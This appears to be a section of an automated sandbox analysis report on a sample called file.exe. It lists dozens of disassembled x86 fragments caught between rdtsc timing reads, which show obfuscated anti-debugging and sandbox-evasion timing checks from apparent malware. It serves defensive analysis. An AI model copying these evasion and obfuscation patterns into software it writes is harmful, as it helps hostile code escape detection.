                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121573B second address: 12157A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov bl, 21h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F04D4C79EA8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c or dword ptr [ebp+1248D34Ch], ecx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F04D4C79EA8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push ecx 0x0000004f movzx edi, di 0x00000052 pop ebx 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214821 second address: 121483E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F04D4C82A4Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F04D4C82A46h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12166FD second address: 1216701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12158CD second address: 12158D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216701 second address: 1216707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216707 second address: 1216756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F04D4C82A46h 0x00000009 jmp 00007F04D4C82A50h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jnl 00007F04D4C82A4Eh 0x00000018 jnl 00007F04D4C82A48h 0x0000001e push edi 0x0000001f pop edi 0x00000020 nop 0x00000021 mov dword ptr [ebp+122D1EBDh], edi 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+1245C7DBh], eax 0x0000002f xor edi, 7A7C44E4h 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+1246016Fh], edi 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121599F second address: 12159B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F04D4C79EADh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216756 second address: 1216760 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216760 second address: 1216782 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F04D4C79EB8h 0x00000008 jmp 00007F04D4C79EB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216782 second address: 1216787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121767B second address: 12176B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F04D4C79EA8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 nop 0x00000013 cld 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+1245CF6Bh], ecx 0x0000001c push 00000000h 0x0000001e or di, DD00h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F04D4C79EA8h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218563 second address: 1218568 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219554 second address: 1219558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218804 second address: 1218829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F04D4C82A46h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218829 second address: 121882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A613 second address: 121A617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A617 second address: 121A61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A61D second address: 121A627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F04D4C82A46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A627 second address: 121A62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B64B second address: 121B655 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5AA second address: 121C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B857 second address: 121B871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jc 00007F04D4C82A4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C5AE second address: 121C5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C7F7 second address: 121C81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F04D4C82A46h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234BD second address: 12234C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234C1 second address: 12234DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F04D4C82A51h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234DC second address: 12234E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234E0 second address: 12234EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234EF second address: 12234F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234F3 second address: 12234FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C82A46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12234FF second address: 1223505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223505 second address: 1223521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A58h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223521 second address: 1223531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F04D4C79EA6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12240CF second address: 12240D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122DDA1 second address: 122DDB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F04D4C79EA6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FF7A second address: 122FF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FF7E second address: 122FFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F04D4C79EACh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f jmp 00007F04D4C79EABh 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F04D4C79EB5h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FFBA second address: 122FFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230258 second address: 1230274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230274 second address: 12302BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F04D4C82A55h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 jmp 00007F04D4C82A58h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12302BA second address: 1041A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 jno 00007F04D4C79EAEh 0x0000000e push dword ptr [ebp+122D11D9h] 0x00000014 pushad 0x00000015 mov ecx, 3A2A0D64h 0x0000001a mov bx, BC7Fh 0x0000001e popad 0x0000001f call dword ptr [ebp+122D27AFh] 0x00000025 pushad 0x00000026 jo 00007F04D4C79EACh 0x0000002c mov dword ptr [ebp+122D17D9h], edx 0x00000032 xor eax, eax 0x00000034 mov dword ptr [ebp+122D17D9h], edi 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cld 0x0000003f jmp 00007F04D4C79EB5h 0x00000044 mov dword ptr [ebp+122D385Bh], eax 0x0000004a stc 0x0000004b mov esi, 0000003Ch 0x00000050 pushad 0x00000051 mov ax, 116Bh 0x00000055 popad 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a cld 0x0000005b lodsw 0x0000005d jmp 00007F04D4C79EAAh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jnl 00007F04D4C79EACh 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D17D9h], ebx 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F04D4C79EB1h 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12343CE second address: 12343D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12343D2 second address: 1234406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F04D4C79EACh 0x0000000c jmp 00007F04D4C79EADh 0x00000011 popad 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F04D4C79EAFh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234406 second address: 123440F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234B8A second address: 1234B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jnp 00007F04D4C79EACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234B9F second address: 1234BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234BA3 second address: 1234BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F04D4C79EA6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235158 second address: 1235166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F04D4C82A46h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235166 second address: 1235172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F04D4C79EA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235172 second address: 1235179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235179 second address: 123517E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123517E second address: 1235184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239DA6 second address: 1239DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239DB2 second address: 1239DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF1A4 second address: 11FF1A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF1A8 second address: 11FF244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jno 00007F04D4C82A46h 0x00000014 jnp 00007F04D4C82A46h 0x0000001a popad 0x0000001b jmp 00007F04D4C82A54h 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F04D4C82A48h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c lea eax, dword ptr [ebp+12490EE3h] 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F04D4C82A48h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c xor dword ptr [ebp+122D1B38h], edx 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F04D4C82A52h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF244 second address: 11FF24A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF24A second address: 11FF24E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF24E second address: 11E5347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push esi 0x0000000b jns 00007F04D4C79EA6h 0x00000011 pop esi 0x00000012 pop esi 0x00000013 nop 0x00000014 jnp 00007F04D4C79EACh 0x0000001a mov ecx, dword ptr [ebp+122D3717h] 0x00000020 call dword ptr [ebp+1245FF67h] 0x00000026 jp 00007F04D4C79ECBh 0x0000002c pushad 0x0000002d jmp 00007F04D4C79EB7h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF6AE second address: 11FF6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF6B4 second address: 11FF6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F04D4C79EACh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFA2F second address: 11FFA44 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04D4C82A48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b mov ecx, eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFB02 second address: 11FFB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04D4C79EAFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F04D4C79EADh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFB2E second address: 11FFB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFB32 second address: 11FFB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200107 second address: 1200179 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F04D4C82A4Bh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 add dword ptr [ebp+122D17CCh], ebx 0x00000019 push 0000001Eh 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F04D4C82A48h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edx, dword ptr [ebp+122D3943h] 0x0000003b nop 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 jl 00007F04D4C82A46h 0x00000046 popad 0x00000047 jmp 00007F04D4C82A57h 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pushad 0x00000052 popad 0x00000053 pop eax 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12002E1 second address: 12002E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12002E5 second address: 12002EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B987A second address: 11B9884 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04D4C79EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239660 second address: 123966B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239957 second address: 123997B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F04D4C79EB8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123997B second address: 1239987 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F04D4C82A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239987 second address: 1239995 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F04D4C79EA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3976 second address: 11C3983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12408F7 second address: 124090A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C79EADh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124090A second address: 124090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240BC9 second address: 1240BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F04D4C79EAAh 0x0000000f pushad 0x00000010 jg 00007F04D4C79EA6h 0x00000016 jc 00007F04D4C79EA6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240D12 second address: 1240D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240D18 second address: 1240D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240D1C second address: 1240D37 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F04D4C82A46h 0x00000015 ja 00007F04D4C82A46h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240D37 second address: 1240D3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
